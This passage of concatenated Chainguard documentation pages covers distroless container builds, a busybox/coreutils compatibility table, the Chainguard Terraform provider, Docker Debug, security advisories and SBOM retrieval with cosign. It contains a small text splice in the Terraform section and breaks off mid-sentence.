"sha256:cfc10a76380242be256af62b8782e536770dee83dcc823fce6c196c1ef5638e5", "sha256:bc7690d8bd810d969e6601d8468b4ae42fa411dfe460440e96092db454d80080" ] }, Example 2: Incorporating Application-Level Dependencies in Distroless Images When working with language ecosystems that have their own dependency management tools such as PHP (Composer) and Node (npm), a multi stage build is necessary to include application dependencies within the final distroless runtime. The next example creates a Dockerfile to run a demo PHP application that has third-party dependencies managed by Composer. The application is a single executable that queries the cat facts API and returns a random fact. Start by creating a directory for the demo. We’ll call it distroless-php. mkdir ~/distroless-php && cd $_ The following command will create a new composer.json file with a single dependency, a small curl library called minicli/curly. We are using a shared volume so that the vendor folder is shared with our local directory. docker run --rm --entrypoint composer --user=root -v ${PWD}:/app cgr.dev/chainguard/php:latest-dev require minicli/curly In this case, we had to use the root image user in order to be able to write files in the current host directory. The following command will fix file permissions for our current system user: sudo chown -R ${USER}:${USER} . Now create the PHP executable. You can call it catfact.php: nano catfact.php The following code makes a query to the cat facts API, returning the quote as output. Copy the contents to your own catfact.php script: <?php require __DIR__ . '/vendor/autoload.php'; $curly = new Minicli\Curly\Client(); $response = $curly->get("https://catfact.ninja/fact"); if ($response['code'] === 200) { echo "\n" . json_decode($response['body'], true)['fact'] . "\n"; return 0; } echo "query error."; return 1; Save the file when you’re done. Now you can create your Dockerfile. nano Dockerfile The following Dockerfile will create a run.php script that makes a curl query using the library we just added as a dependency. FROMcgr.dev/chainguard/php:latest-dev AS builderUSERrootCOPY . /appRUN chown -R php /appUSERphpRUN cd /app && \ composer install --no-progress --no-dev --prefer-distFROMcgr.dev/chainguard/php:latestCOPY --from=builder /app /appENTRYPOINT [ "php", "/app/catfact.php" ]Now you can build the image with: docker build . -t distroless-demo-php Finally, you can run the new app with: docker run --rm distroless-demo-php And you should get a cat fact as output, such as: A domestic cat can run at speeds of 30 mph. Upon inspection with docker images, you can check the image size around 38MB: ❯ docker images distroless-demo-php REPOSITORY TAG IMAGE ID CREATED SIZE distroless-demo-php latest 8691d09f56ca 2 minutes ago 37.9MB For comparison, the php:cli-alpine image is almost 3 times bigger: ❯ docker images php:cli-alpine REPOSITORY TAG IMAGE ID CREATED SIZE php cli-alpine 7879e816aba0 6 days ago 104MB Final Considerations Distroless images offer a compelling approach to creating minimal and secure container images by stripping away system components that are unnecessary at execution time, such as package managers and shells. While such images offer many advantages, they might require some adjustments in your existing development and deployment workflows. In this guide we demonstrated how to use multi stage builds to create final distroless images that include additional components, such as static binaries and application-level dependencies. You can find more examples in our Getting Started Guides page. Check also our article on Debugging Distroless Images for important tips when you run into issues and need to debug containers running distroless images. --- ### Debian Compatibility URL: https://edu.chainguard.dev/chainguard/migration/compatibility/debian-compatibility/ Last Modified: March 8, 2024 Tags: Chainguard Containers, Product, Reference Chainguard Containers and Debian base images have different binaries and scripts included in their respective busybox and coreutils packages. The following table lists common tools and their corresponding package(s) in both Wolfi and Debian distributions. Note that $PATH locations like /usr/bin or /sbin are not included here. If you have compatibility issues with tools that are included in both busybox and coreutils, be sure to check $PATH order and confirm which version of a tool is being run. Generally, if a tool exists in busybox but does not have a coreutils counterpart, there will be a specific package that includes it. For example the zcat utility is included in the gzip package in both Wolfi and Debian. You can use the apk search command in Wolfi, and the apt-cache search command in Debian to find out which package includes a tool. Utility Wolfi busybox Debian busybox Wolfi coreutils Debian coreutils [ ✅ ✅ ✅ ✅ [[ ✅ ✅ acpid ✅ add-shell ✅ addgroup ✅ adduser ✅ adjtimex ✅ ✅ ar ✅ arch ✅ ✅ ✅ arp ✅ arping ✅ ✅ ascii ✅ ash ✅ ✅ awk ✅ ✅ b2sum ✅ ✅ base32 ✅ ✅ base64 ✅ ✅ ✅ ✅ basename ✅ ✅ ✅ ✅ basenc ✅ ✅ bbconfig ✅ bc ✅ ✅ beep ✅ bin ✅ blkdiscard ✅ blkid ✅ blockdev ✅ brctl ✅ bunzip2 ✅ ✅ bzcat ✅ ✅ bzip2 ✅ ✅ cal ✅ ✅ cat ✅ ✅ ✅ ✅ chattr ✅ chcon ✅ ✅ chgrp ✅ ✅ ✅ ✅ chmod ✅ ✅ ✅ ✅ chown ✅ ✅ ✅ ✅ chpasswd ✅ chroot ✅ ✅ ✅ ✅ chrt ✅ chvt ✅ cksum ✅ ✅ ✅ clear ✅ ✅ cmp ✅ ✅ comm ✅ ✅ ✅ coreutils ✅ cp ✅ ✅ ✅ ✅ cpio ✅ ✅ crc32 ✅ cryptpw ✅ csplit ✅ ✅ cttyhack ✅ cut ✅ ✅ ✅ ✅ date ✅ ✅ ✅ ✅ dc ✅ ✅ dd ✅ ✅ ✅ ✅ deallocvt ✅ delgroup ✅ deluser ✅ depmod ✅ devmem ✅ df ✅ ✅ ✅ ✅ diff ✅ ✅ dir ✅ ✅ dircolors ✅ ✅ dirname ✅ ✅ ✅ ✅ dmesg ✅ ✅ dnsdomainname ✅ ✅ dos2unix ✅ ✅ du ✅ ✅ ✅ ✅ dumpkmap ✅ dumpleases ✅ echo ✅ ✅ ✅ ✅ ed ✅ egrep ✅ ✅ env ✅ ✅ ✅ ✅ expand ✅ ✅ ✅ ✅ expr ✅ ✅ ✅ ✅ factor ✅ ✅ ✅ ✅ fallocate ✅ ✅ false ✅ ✅ ✅ ✅ fatattr ✅ fdisk ✅ fgrep ✅ ✅ find ✅ ✅ findfs ✅ ✅ flock ✅ fmt ✅ ✅ fold ✅ ✅ ✅ ✅ free ✅ ✅ freeramdisk ✅ fsfreeze ✅ fstrim ✅ fsync ✅ ftpget ✅ ftpput ✅ fuser ✅ getopt ✅ ✅ getty ✅ ✅ grep ✅ ✅ groups ✅ ✅ ✅ gunzip ✅ ✅ gzip ✅ ✅ halt ✅ hd ✅ head ✅ ✅ ✅ ✅ hexdump ✅ ✅ hostid ✅ ✅ ✅ ✅ hostname ✅ ✅ httpd ✅ hwclock ✅ i2cdetect ✅ i2cdump ✅ i2cget ✅ i2cset ✅ i2ctransfer ✅ id ✅ ✅ ✅ ✅ ifconfig ✅ ifdown ✅ ifup ✅ init ✅ inotifyd ✅ insmod ✅ install ✅ ✅ ✅ ionice ✅ ✅ iostat ✅ ip ✅ ipcalc ✅ ipcrm ✅ ipcs ✅ ipneigh ✅ join ✅ ✅ kill ✅ ✅ killall ✅ ✅ killall5 ✅ klogd ✅ last ✅ less ✅ ✅ link ✅ ✅ ✅ ✅ linux32 ✅ ✅ linux64 ✅ ✅ linuxrc ✅ ln ✅ ✅ ✅ ✅ loadfont ✅ loadkmap ✅ logger ✅ ✅ login ✅ ✅ logname ✅ ✅ ✅ logread ✅ losetup ✅ ls ✅ ✅ ✅ ✅ lsattr ✅ lsmod ✅ lsof ✅ lsscsi ✅ lzcat ✅ ✅ lzma ✅ ✅ lzop ✅ ✅ lzopcat ✅ md5sum ✅ ✅ ✅ ✅ md5sum.textutils ✅ mdev ✅ microcom ✅ ✅ mim ✅ mkdir ✅ ✅ ✅ ✅ mkdosfs ✅ mke2fs ✅ mkfifo ✅ ✅ ✅ ✅ mknod ✅ ✅ ✅ ✅ mkpasswd ✅ ✅ mkswap ✅ mktemp ✅ ✅ ✅ ✅ modinfo ✅ modprobe ✅ more ✅ ✅ mount ✅ mountpoint ✅ mpstat ✅ mt ✅ mv ✅ ✅ ✅ ✅ nameif ✅ nc ✅ netstat ✅ ✅ nice ✅ ✅ ✅ nl ✅ ✅ ✅ ✅ nmeter ✅ nohup ✅ ✅ ✅ nologin ✅ ✅ nproc ✅ ✅ ✅ ✅ nsenter ✅ ✅ nslookup ✅ nuke ✅ numfmt ✅ ✅ od ✅ ✅ ✅ ✅ openvt ✅ partprobe ✅ passwd ✅ paste ✅ ✅ ✅ ✅ patch ✅ pathchk ✅ ✅ pgrep ✅ pidof ✅ ✅ ping ✅ ✅ ping6 ✅ ✅ pinky ✅ ✅ pipe_progress ✅ pivot_root ✅ ✅ pkill ✅ pmap ✅ poweroff ✅ pr ✅ ✅ printenv ✅ ✅ ✅ printf ✅ ✅ ✅ ✅ ps ✅ ✅ pstree ✅ ptx ✅ ✅ pwd ✅ ✅ ✅ ✅ pwdx ✅ rdate ✅ rdev ✅ readahead ✅ readlink ✅ ✅ ✅ ✅ realpath ✅ ✅ ✅ ✅ reboot ✅ remove-shell ✅ renice ✅ ✅ reset ✅ ✅ resize ✅ resume ✅ rev ✅ ✅ rm ✅ ✅ ✅ ✅ rmdir ✅ ✅ ✅ ✅ rmmod ✅ route ✅ rpm ✅ rpm2cpio ✅ run-init ✅ run-parts ✅ ✅ runcon ✅ ✅ sbin ✅ sed ✅ ✅ seq ✅ ✅ ✅ ✅ setkeycodes ✅ setpriv ✅ ✅ setserial ✅ setsid ✅ ✅ sh ✅ ✅ sha1sum ✅ ✅ ✅ ✅ sha224sum ✅ ✅ sha256sum ✅ ✅ ✅ ✅ sha384sum ✅ ✅ sha3sum ✅ ✅ sha512sum ✅ ✅ ✅ ✅ shred ✅ ✅ ✅ ✅ shuf ✅ ✅ ✅ ✅ sleep ✅ ✅ ✅ ✅ sort ✅ ✅ ✅ ✅ split ✅ ✅ ✅ ssl_client ✅ start-stop-daemon ✅ stat ✅ ✅ ✅ ✅ stdbuf ✅ ✅ strings ✅ ✅ stty ✅ ✅ ✅ ✅ su ✅ sum ✅ ✅ ✅ svc ✅ svok ✅ swapoff ✅ swapon ✅ switch_root ✅ sync ✅ ✅ ✅ ✅ sysctl ✅ ✅ syslogd ✅ tac ✅ ✅ ✅ ✅ tail ✅ ✅ ✅ ✅ tar ✅ ✅ taskset ✅ tee ✅ ✅ ✅ ✅ telnet ✅ test ✅ ✅ ✅ ✅ tftp ✅ time ✅ ✅ timeout ✅ ✅ ✅ ✅ top ✅ ✅ touch ✅ ✅ ✅ ✅ tr ✅ ✅ ✅ ✅ traceroute ✅ ✅ traceroute6 ✅ ✅ tree ✅ true ✅ ✅ ✅ ✅ truncate ✅ ✅ ✅ ✅ ts ✅ tsort ✅ ✅ ✅ tty ✅ ✅ ✅ ✅ ttysize ✅ tunctl ✅ ubirename ✅ udhcpc ✅ udhcpd ✅ uevent ✅ umount ✅ uname ✅ ✅ ✅ ✅ uncompress ✅ unexpand ✅ ✅ ✅ ✅ uniq ✅ ✅ ✅ ✅ unix2dos ✅ ✅ unlink ✅ ✅ ✅ ✅ unlzma ✅ ✅ unlzop ✅ unshare ✅ unxz ✅ ✅ unzip ✅ ✅ uptime ✅ ✅ users ✅ ✅ usleep ✅ ✅ usr ✅ uudecode ✅ ✅ uuencode ✅ ✅ vconfig ✅ ✅ vdir ✅ ✅ vi ✅ ✅ vlock ✅ w ✅ watch ✅ ✅ watchdog ✅ wc ✅ ✅ ✅ ✅ wget ✅ which ✅ ✅ who ✅ ✅ ✅ ✅ whoami ✅ ✅ ✅ ✅ xargs ✅ ✅ xxd ✅ ✅ xz ✅ xzcat ✅ ✅ yes ✅ ✅ ✅ ✅ zcat ✅ ✅ --- ### Introduction to the Chainguard Terraform Provider URL: https://edu.chainguard.dev/chainguard/administration/terraform-provider/ Last Modified: May 9, 2024 Tags: Product, Overview Terraform is an infrastructure as code tool that allows users to declaratively configure resources in cloud providers like AWS and GCP, SaaS platforms, and many other API-driven environments. Terraform providers are written by third-party developers to allow Terraform to manage resources in their environment. The Chainguard Terraform provider enables users to manage resources on the Chainguard Platform, such as identities, role-bindings, custom roles, and more. This guide provides a brief introduction to the Chainguard Terraform provider, including how to configure it and use it to manage your Chainguard resources. Prerequisites In order to use the Chainguard Terraform provider, you will need to install Terraform on your local machine. Also, while it isn’t necessary for using the Chainguard Terraform provider, this guide assumes you have chainctl installed in order to retrieve some information about your Chainguard resources. Configuring the Chainguard Terraform provider Terraform uses a native configuration language to define resources. Each configuration is stored in one or more .tf files, which in turn are stored in what is called a root module. When using the Terraform CLI, the root module is the working directory where you invoke terraform commands to create or destroy your resources. To use the Chainguard Terraform provider, add it to the block of required providers in your configuration: terraform { required_providers { chainguard = { source = "chainguard-dev/chainguard" } } } If you don’t have an active Chainguard token when you apply the configuration, the provider will automatically launch a browser to complete the Oauth 2 flow with one of the default identity providers: GitHub, GitLab, or Google. This means the Terraform provider does not require chainctl to be installed to manage authentication with Chainguard. You can customize the behavior of the authentication flow in a number of ways. For example, you can specify an identity to assume, or a verified organization name in order to use a previously-configured custom identity provider: provider "chainguard" { login_options { organization_name = "my-org.com" # identity_id is the exact ID of an assumable identity. # Get this ID with chainctl iam identities list identity_id = "1f127a7c0609329f04b43d845cf80eea4247a07c/d6305475446bbef6" } } You can also configure the provider to use an OIDC token, either by supplying it directly or pulling it from a file, with the automatic browser flow disabled. This is useful when setting up CI workflows: provider "chainguard" { login_options { # Disable the automatic browser authentication flow. disabled = true identity_token = "/path/to/oidc/token" } } You can find more information about authenticating with the Chainguard Terraform provider in the provider documentation and the included examples. Defining Organization References Terraform was designed to allow users to manage various resources declaratively. In practice, this means that you define the state you want your resources to be in and then you let Terraform and the provider handle the details of bringing that state to reality. Resources on the Chainguard platform are organized in a hierarchical structure consisting of Organizations and Folders. An organization is a customer or group of customers working with the same Chainguard resources, while a folder is a collection of resources within a Chainguard organization. Most users will only need to work at the organization level. All user-managed resources are defined in relation to the organization to which they belong. This means developers need to be able to reference their organization throughout their configuration. We’ll outline two ways to define this kind of reference: using local values and data sources. For more details on referencing an organization, please refer to the chainguard_group resource documentation for more information. Note: Chainguard organizations were previously called “groups,” with a “root group” representing what is now referred to as an organization and “subgroups” referring to folders. As of this writing, the Chainguard Terraform provider still refers to “groups” instead of organizations. To align with our other IAM resources, this document uses the new nomenclature wherever possible. Defining local values The Terraform configuration language allows you to define local values which assign a name to a given expression. This allows you to reference the name of a local value multiple times throughout a Terraform configuration rather than repeating the expression each time. As an example, this section will outline how to define a local variable representing the ID of a Chainguard organization. If you are familiar with chainctl, you can find your organization’s ID with the following command: chainctl iam organizations list -o table Once you’ve copied the UIDP of your organization (the 40-digit long hex string listed in the ID column of the previous command’s output), you can use it to create a local variable in Terraform: locals { org_id = "[organization UIDP]" } Throughout your Terraform code, you can refer to this value as local.org_id. If you are setting up a reusable Terraform module, you may consider using an input variable instead. Please refer to the Terraform documentation for more information. Using data sources Data sources allow Terraform to access and use information that was defined outside ofWe’ll outline two ways to define this kind of reference: using local values and data sources. The available data sources for Chainguard resources are groups, identities, and roles. If you know the exact name of your organization, you can use a data resource to query the API for it: data "chainguard_group" "org" { # This indicates the group is an organization. parent_id = "/" name = "[organization name]" } To refer to the organization’s ID in other parts of your Terraform configuration, you would use the reference data.chainguard_group.org.id. The rest of the examples in this document will use this for referring to the organization’s ID. Managing users The Chainguard Terraform provider is useful for configuring your organization’s users and roles. When authenticating with the Chainguard platform, you have the option of using the default OIDC providers (GitHub, GitLab, Google). You can also bring your own identity provider, as long as it is OIDC compliant. To configure a new identity provider for your organization, use the chainguard_identity_provider resource. You must provide a parent_id (your organization’s ID), a name (the identity provider service is a good choice), a default_role that new users will be bound to upon their first login, and an oidc configuration: # The default role can be either a built-in role, or a custom role. # To see the list of available built-in roles # use chainctl iam roles list --managed data "chainguard_role" "default_role" { name = "registry.pull_token_creator" } resource "chainguard_identity_provider" "idp" { parent_id = data.chainguard_group.org.id name = "[identity provider service]" description = "My org's identity provider" # Role data sources return list of matched roles. # Don't use data.chainguard_role.default_role.id here, as that # is not the ID of the returned role. default_role = data.chainguard_role.default_role.items.0.id oidc { issuer = "[URL of identity provider issuer]" client_id = "[identity provider client ID]" client_secret = "[identity provider client secret]" # openid scope is always requested, add additional scopes # your identity provider provides (e.g. email, profile) additional_scopes = ["email"] } } As this example shows, you also have the option of including a description of the identity provider. If you’re not bringing your own identity provider, but rather relying on one of the default OIDC providers, you can still pre-bind users to roles within your organization so they can log in and access your organization’s resources right away. As an example, say you want your users to log in with their GitHub account. To pre-bind users to a role within your organization, you will need to know their GitHub IDs and add them to a Terraform configuration like the following: # Create a custom role in this example for first time users. resource "chainguard_role" "default_role" { parent_id = data.chainguard_group.org.id name = "org-default-role" description = "The role new users are bound to on first login." # A full list of all capabilities you can assign to a role # are available with chainctl iam roles capabilities list capabilities = [ "groups.list", "repo.list", "tag.list", ... ] } # Gather a list of user identities data "chainguard_identity" "users" { # Assumes there exists a github_ids set variable defined # with the GitHub IDs of your users for_each = var.github_ids # The issuer is always the same when using the default # OIDC providers. issuer = "https://auth.chainguard.dev/" # Subjects are prepended with the name of the OIDC provider # when using the default provider: github, gitlab, or google-oauth2 subject = "github|${each.key}” } # Bind your users to a default role resource "chainguard_rolebinding" "default_bindings" { for_each = var.github_ids group = data.chainguard_group.org.id identity = data.chainguard_identity.users[each.key].id role = chainguard_role.default_role.id } After applying this Terraform configuration, any user whose GitHub ID was included can log in and will already be bound to the default role. Learn more The Chainguard Terraform provider documentation includes examples of how you can use it to manage your Chainguard resources. For more information on setting up custom identity providers, we encourage you to check out our documentation on setting up custom IDPs, as well as our examples for Okta, Ping Identity, and Microsoft Entra ID. Additionally, our tutorial on using the Terraform provider to grant members of a GitHub team access to the resources managed by a Chainguard organization provides more context and information to the method outlined in this guide. --- ### Debugging Distroless Containers with Docker Debug URL: https://edu.chainguard.dev/chainguard/chainguard-images/troubleshooting/debugging_distroless/ Last Modified: December 12, 2024 Tags: Product, Chainguard Containers, Video Tools used in this video Docker Desktop (Note a paid subscription is required.) Transcript Hey folks, I wanted to record a short video explaining how you can debug container images, even distroless ones. One of the problems with distroless images is that they can be difficult to debug. Now if you’re using Kubernetes, please try out ephemeral containers, but in this video I want to talk about something else. In Docker desktop 4.27 they have a beta feature called debug, and I’m going to demonstrate that now. So I’m going to start a Chainguard nginx image. Note that Chainguard nginx images run on port 8080 for security reasons. Now that should be running in the background, so if I switch to my browser and we hit reload, yep nginx is there and running. So say I want to debug this nginx container, say it’s not displaying the right content or it can’t reach another container, something like that. So typically what you might want to do is use docker exec to get a shell into the container. But if I try to run bash, I get told there is no bash, and I get told there is no sh. And even if I get the full path, it doesn’t work. Because this is a distroless container, there’s no shell available to me. There are also very few utils. So I can’t even run ping for example. So the only way to debug this container at the minute is from the outside, if you like. Or is it? Because with Docker 4.27, I now have this debug command. So if I run docker debug debug test, this is what happens. And suddenly I have a shell into the container. Basically what’s happened is it’s side loaded a Nix environment into the container. And from here I can install tools to debug things. It also has a linting tool to check the entry point. So you can see the entry point here is fine. It does have editors, et cetera. I believe ping is here. Yep. So what can we do? We can also look at the container file system and edit it live. So for example, if I do /etc/nginx, and autocomplete works, and here’s the default conf, and there’s the location of the nginx files. So let’s take a look at these nginx files. And here’s index.html. And this is welcome to nginx. So let’s try live editing this. Okay. I saved that. Now let’s go back to our browser and reload it. Yeah. So there we are. I’ve live edited a distroless container that had no shell and no editor inside it. So there is more you can do. You can install further tooling, but like I said, it does have some basic tooling with it. But like say, I don’t know if you want to install a different editor, you can definitely do that. So here we go. There’s install emacs. Note this is a beta version. So I have noticed this error coming up a few times or warning. I do believe it’s actually innocuous and hopefully that will be changed in newer versions, but it has actually installed emacs there. Now I don’t use emacs. So I always have to struggle to escape. Is it control? Oh, no. There we go. Okay. So there you go. That’s how you can debug a distroless container using the new Docker debug feature. Please do give it a go and let me know how you get on. Relevant Resources Debugging Distroless Container Images with Kubectl Debug and CDebug (Video) Debugging Distroless Container Images (Article) --- ### How to Use Chainguard Security Advisories URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/security-advisories/how-to-use/ Last Modified: April 11, 2025 Tags: Chainguard Containers, CVE, Product When using scanners such as Grype or Docker Scout to scan for vulnerabilities in Chainguard Containers, you’ll often find that there are few or no CVEs present. However, CVEs can sometimes be found in Chainguard Containers, and you may also encounter CVEs if you’re using older tags. In these cases, you will likely wish to check Chainguard’s security advisories for information on which CVEs will cause security issues in your deployment. To help demystify the nature of CVEs within Chainguard Containers, we’ve created a self-service Security Advisories page that lists every security advisory published for Chainguard Containers. Having this information available allows you to view whether Chainguard is aware of a specific vulnerability reported to exist within a Chainguard Container and whether we’ve mitigated or are planning to mitigate the CVE. In alignment with the Chainguard Container Product Release Lifecycle, our vulnerability management strategy focuses on the latest versions of any given release track, as these are the versions we actively maintain and secure. Accordingly, we only publish new CVE advisories for packages that fall within our defined support scope. We do not actively monitor non-supported versions of a package or image. Our efforts are centered on keeping the latest versions up-to-date and as close to zero CVEs as we can, while encouraging customers to upgrade and stay on supported versions. This guide outlines how you can use Chainguard’s Security Advisories to learn more about the status of a CVE within a given package. It will walk through a practical example of discovering a vulnerability in a Chainguard Container, searching for Security Advisories associated with this vulnerability, and then comparing the original container image with a later version. Prerequisites You don’t need any special access or software to explore Chainguard’s Security Advisories. However, this guide includes a few examples that use specific software tools in order to outline a practical example of how one might navigate and use these Security Advisories. To follow along with these examples, you’ll need the following tools installed. A security scanner like Trivy, Grype, or Docker Scout — This guide’s examples use Grype to scan container images and identify vulnerabilities. However, you should be able to follow along with any container vulnerability scanning tool. chainctl — Chainguard’s command-line interface tool. To install chainctl, follow our installation guide. jq — jq is a command-line JSON processor that allows you to filter and manipulate streaming JSON data. Although it isn’t strictly necessary for the purposes of this guide, this tutorial includes commands that use jq to filter command output that would otherwise be difficult to read. You can install jq by following the instructions on the project’s Download jq page. Lastly, note that this guide includes examples involving a sample organization with a private registry provided by Chainguard and named example.com. If you would like to follow along with your own private Chainguard Containers, be sure to change this where relevant to reflect your own setup. If you don’t have access to a private registry, you can also follow along using Chainguard’s public Starter Containers, but be aware that these are limited to only the latest or latest-dev tags. You can download public Starter Containers from the cgr.dev/chainguard registry, as in cgr.dev/chainguard/go:latest. So you’ve encountered a CVE in a Chainguard Container Say you use a vulnerability scanner like Grype or Docker Scout to inspect a certain Chainguard Container. This example uses Grype to scan a Production container image, specifically one tagged with 1.21.2. As of this writing, the go:1.21.2 image points to the image digest sha256:04ab6905552b54a6977bed40a4105e9c95f78033e1cde67806259efc4beb959d. Be aware that this tag will be withdrawn in the future, but the digest will remain available. grype cgr.dev/example.com/go:1.21.2 Because this is the digest for an older version of Chainguard’s Go container image, this command’s output will show a number of vulnerabilities that have been found to exist within this specific version of the container image. . . . ├── by severity: 28 critical, 230 high, 185 medium, 4 low, 0 ... This output shows that this particular image has many critical and high vulnerabilities. The Grype output also lists each of the packages affected by CVEs as well as the specific vulnerabilities it found for each. Note: All of these vulnerabilities have been addressed in newer versions of the Go Chainguard Container. Within this output,, we find that the package nghttp2 is referenced. grype cgr.dev/example.com/go:1.21.2| grep nghttp2 ... libnghttp2-14 1.56.0-r0 1.57.0-r0 apk CVE-2023-44487 High libnghttp2-14 1.56.0-r0 1.61.0-r0 apk CVE-2024-28182 Medium libnghttp2-14 1.56.0-r0 1.57.0-r0 apk GHSA-qppj-fm5r-hxr3 Unknown We’ll use the HIGH severity vulnerability listed here as an example when we explore Chainguard’s Security Advisories in the next section. Copy or note down the CVE identifier (2023-44487 in this case). Additionally, note down the name of the affected package (nghttp2). You’ll use these details to retrieve more information about the CVE shortly. Searching the Security Advisories After finding a vulnerability in a Chainguard Container, you can navigate to Chainguard’s Security Advisories page. This is a helpful resource you can use to determine the status for any CVE found within a Chainguard Container. The Security Advisories page is self-service, allowing you to check whether Chainguard is aware of a specific vulnerability and whether it has been mitigated in a certain package version. You can search the Security Advisories page by entering any CVE identifier to find what packages are affected by that CVE. You can also enter the names of individual packages to find what CVEs have been reported within them. Enter the CVE identifier you copied previously (2023-44487) into the search box at the top of the page. This will immediately filter the list of security advisories to only show packages where that CVE has been reported. It will also show the Status of each. If you click on any row in the filtered list, it will take you to the CVE’s specific page. There, you’ll find a list of every package where this CVE has been reported. As with the Security Advisories landing page, you can filter by package name here on the CVE’s landing page as well. Enter the name of the package we highlighted previously (nghttp2) and the index will immediately filter out any packages that do not mention that string in their metadata. As the previous screenshot highlights, for CVE-2023-44487, the nghttp2 package’s Status is marked as Fixed in version 1.57.0-r0 as of October 11, 2023. Comparing Containers Chainguard’s Security Advisories have told us that the CVE-2023-44487 was fixed and removed from nghttp2 with a more recent version than the one available in Chainguard’s go:1.21.2 image. However, we don’t have to take that report at face value; we can inspect a later version of the same container image and compare it with version 1.21.2 to determine whether the vulnerability is still present in the later version. If you inspect a later version of the image with Grype, you’ll find that this time it does not report the high CVE we noted earlier. This example inspects version 1.21.5 of the image. grype cgr.dev/example.com/go:1.21.5 | grep nghttp2 You should find that the high CVE fixed in this specific version no longer appears in the output. (You may still see other CVEs fixed in later versions.) You can go a step further by comparing these two container images directly with the chainctl images diff command, as in this example. chainctl images diff \ cgr.dev/example.com/go:1.21.2 \ cgr.dev/example.com/go:1.21.5 | jq . This example will return a lot of output, as there are significant differences from version 1.21.2 to 1.21.5 of the Go container image. If you scroll down to the vulnerabilities section of this output, you’ll find a list of vulnerabilities that are present in version 1.21.2 but have been removed by version 1.21.5. "vulnerabilities": { . . . { "id": "CVE-2023-44487", "reference": "chainguard:distro:chainguard:rolling", "severity": "High" }, . . . As this output indicates, CVE0223-44487 is no longer present in later versions of the Go Chainguard Container. If you were using version 1.21.2, you should seriously consider upgrading to a later version. Learn More The Security Advisories page serves as a helpful resource for anyone who wants to learn more about CVEs reported within Chainguard Containers. You can search the database of advisories to learn more about any CVEs you encounter as you work with Chainguard Containers. Additionally, we encourage you to explore the Chainguard Containers Directory, the parent site of the Security Advisories page. The Directory allows users to explore the complete inventory of Chainguard Containers. Finally, we encourage you to learn more about noisy scan results when scanning Chainguard Containers. --- ### How to Retrieve SBOMs for Chainguard Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/how-to-use/retrieve-image-sboms/ Last Modified: April 8, 2025 Tags: Chainguard Containers, SBOM Chainguard Containers contain only the minimum number of packages needed to use the software they contain. The purpose of this is to reduce the image’s attack surface and minimize the risk that CVEs will impact software that depends on these container images. Even though they contain the minimum number of packages, there may come a time when you want to know exactly what’s running inside of a certain Chainguard Container. For this reason, we include a signed SBOM with each image in the form of a software attestation. Cosign — a part of the Sigstore project — supports software artifact signing, verification, and storage in an OCI (Open Container Initiative) registry, as well as the retrieval of said artifacts. This tutorial outlines how you can use the cosign command to retrieve a Chainguard Container’s SBOM. Prerequisites In order to follow this guide, you’ll need the following installed on your local machine: Cosign — to retrieve SBOMs associated with Chainguard Containers, check out our guide on installing Cosign to configure it. jq — to process JSON, visit the jq downloads page to set it up. Using Cosign to retrieve an container image’s SBOM Cosign includes a download command that allows you to retrieve a Chainguard Container’s attestation over the command line. To do so, you would use this command with syntax like the following. cosign download attestation cgr.dev/chainguard/php | jq -r .payload | base64 -d | jq .predicate This example command downloads the attestation of our php image. Notice that this example syntax includes download attestation rather than download sbom. You can generally think of an attestation as an authenticated statement about a software artifact. There are different types of attestations as defined by the SLSA 1.0 specification, and they are typically referenced by their predicate type. One of the available predicate types is SPDX, an open standard for SBOM files. Because attestations must be signed, this is a way to verify the authenticity of the software producer, thereby ensuring the accuracy of the SBOM and the quality of the software. This attestation data is encoded in base64, making it unreadable without further processing. This is why the output from the first part of the command is piped into jq in order to filter out the payload section of the output containing the SBOM. This filtered output is then passed into the base64 command to be decoded before that output is piped into another jq command. The final jq command extracts the attestation predicate from the base64 output and returns it to your terminal. As an example, to retrieve the apko image’s attestation you would run a command like this. cosign download attestation \ --platform=linux/amd64 \ --predicate-type=https://spdx.dev/Document \ cgr.dev/chainguard/apko | jq -r .payload | base64 -d | jq .predicate This example includes two extra arguments not included in the example syntax outlined previously. First, it includes the --platform flag which allows you to download the attestation for a specific platform image. This example specifies the linux/amd64 platform, but you could also use linux/arm64. Be aware, though, that in order to use the --platform option you’ll need to have Cosign version 2.2.1 or newer installed. The other extra argument is the --predicate-type flag, required to specify which type of predicate you want to download from the registry. In order to download Chainguard Containers SBOM attestations, you should use the https://spdx.dev/Document predicate type. Image SBOMs in the Chainguard Console You can also find container image SBOMs in the Chainguard Console. After signing in to the Console and clicking either the Public images or, if available, Organization images you’ll be presented with a list of images. Clicking on any of these will take you to the image’s landing page. There, you can click on the SBOM tab to find and download the SBOM for the given image. The following example shows the SBOM tab for the postgres image. You can use the drop-down menu above the table to select which version and architecture of the image you want to view. You can also use the search box to find specific packages in the SBOM or use the button to the right of the search box to download the SBOM to your machine. Check out our guide on using the Chainguard Containers Directory for more details. License Information and Source Code references The SBOM downloaded using either Cosign or Console methods described previously contain identical information. It lists binary packages present in the image, their licensing information using SPDX license and exceptions lists, and external source code references. These source code references are encoded in the external references field, using external repository identifiers in the package URL (purl) format. The purl specification allows for various different schemes and types. The following purls are used in Chainguard SPDX SBOM: pkg:apk denotes binary package origin, name, full version number with epoch, and architecture: pkg:apk/wolfi/ca-certificates-bundle@20240315-r4?arch=x86_64 pkg:github is used for upstream source code reference for packages built from GitHub repositories. These purls always include a fixed commit hash and, when available, also include a tag-version: pkg:github/openssl/openssl.git@openssl-3.3.1 pkg:github/openssl/openssl.git@db2ac4f6ebd8f3d7b2a60882992fbea1269114e2 Note that pkg:github is also used to reference melange packaging files from Wolfi and Chainguard. These are provided with a subpath component and a fixed commit hash: pkg:github/wolfi-dev/os@f18ff825f94b9177cf603c6e3d72936683a504d2#glibc.yaml pkg:generic is used to reference any other upstream download locations, most commonly tarballs: pkg:generic/gcc@13.2.0? checksum=sha256%3A8cb4be3796651976f94b9356fa08d833524f62420d6292c5033a9a26af315078& download_url=https%3A%2F%2Fftp.gnu.org%2Fgnu%2Fgcc%2Fgcc-13.2.0%2Fgcc-13.2.0.tar.gz Also note that pkg:generic is used to reference upstream git repositories, outside of GitHub: pkg:generic/ca-certificates@20240315? vcs_url=git%2Bhttps%3A%2F%2Fgitlab.alpinelinux.org%2Falpine%2Fca-certificates%4009e5e43336e532ec8217ae3bfc912bcb7048f65a purls are human-readable, but various programming and scripting languages have implementations that can parse them. Because SPDX SBOMs are distributed within the Chainguard Containers repository alongside each image hash, you can achieve source code access compliance by ensuring all attestations are mirrored together with each image. As an example, a snippet of a binary package SPDX 